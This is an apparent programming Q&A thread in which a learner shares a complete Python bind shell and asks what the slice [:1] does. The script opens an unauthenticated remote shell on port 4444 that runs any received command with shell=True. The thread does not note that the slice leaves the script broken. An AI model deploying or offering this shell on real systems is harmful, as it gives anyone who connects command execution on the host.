# What does [:1] mean in python?

Tags: python

I am writing a basic bind shell in python. What does [:1] mean in the handle_input method? Does this mean the decode process will only run up to index 1? The tutorial I am learning this from does not explain it.

```
import socket
import subprocess
import click
from threading import Thread

def run_cmd(cmd):
    output = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    return output.stdout


def handle_input(client_socket):
    while True:
        chunks = []
        chunk = client_socket.recv(2048)
        chunks.append(chunk)
        while len(chunk) != 0 and chr(chunk[-1]) != '\n':
            chunk = client_socket.recv(2048)
            chunks.append(chunk)
        cmd = (b''. join(chunks)).decode()[:1] 

        if cmd.lower() == 'exit':
            client_socket.close()
            break

        output = run_cmd(cmd)
        client_socket.sendall(output)

@click.command()
@click.option('--port', 'p', default=4444)
def main(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('0.0.0.0', port))
    s.listen(4)
    
    while True:
        client_socket, _ = s.accept()
        t = Thread(target=handle_input, args=(client_socket, ))
        t.start()


if __name__ == '__main__':
    main()
```

Comment: First remember that you're not dealing with "arrays", but with a [sequence type](https://docs.python.org/3/library/stdtypes.html#sequence-types-list-tuple-range) called *list*. And [the Python documentation](https://docs.python.org/3/) as well as any decent tutorial, book or class should have explained that syntax. So what resources are you using to learn Python? If you don't know that syntax yet, and written that code, then you're probably stretching your knowledge a little bit too much. Relax, take it easy, and learn the very basics first.

Answer (score 2, accepted):

In general, the notation is used as follows:

The colon `:` is used to specify a range. A value before the colon is the starting index. When it is omitted, it defaults to 0. The value after the colon is the end index. So `[:1]` refers to the elements from the start that lead up to but do not include index 1 (so just index 0).

If I understand the code you provided correctly, `cmd = (b''.join(chunks)).decode()[:1]` takes the joined byte chunks, decodes them into a string, and then slices the resulting string so that it only takes the first character.

Comment: Yes thank you! That's exactly what was confusing me, I couldn't figure out what the [:1] is doing here xP thanks so much for the explanation!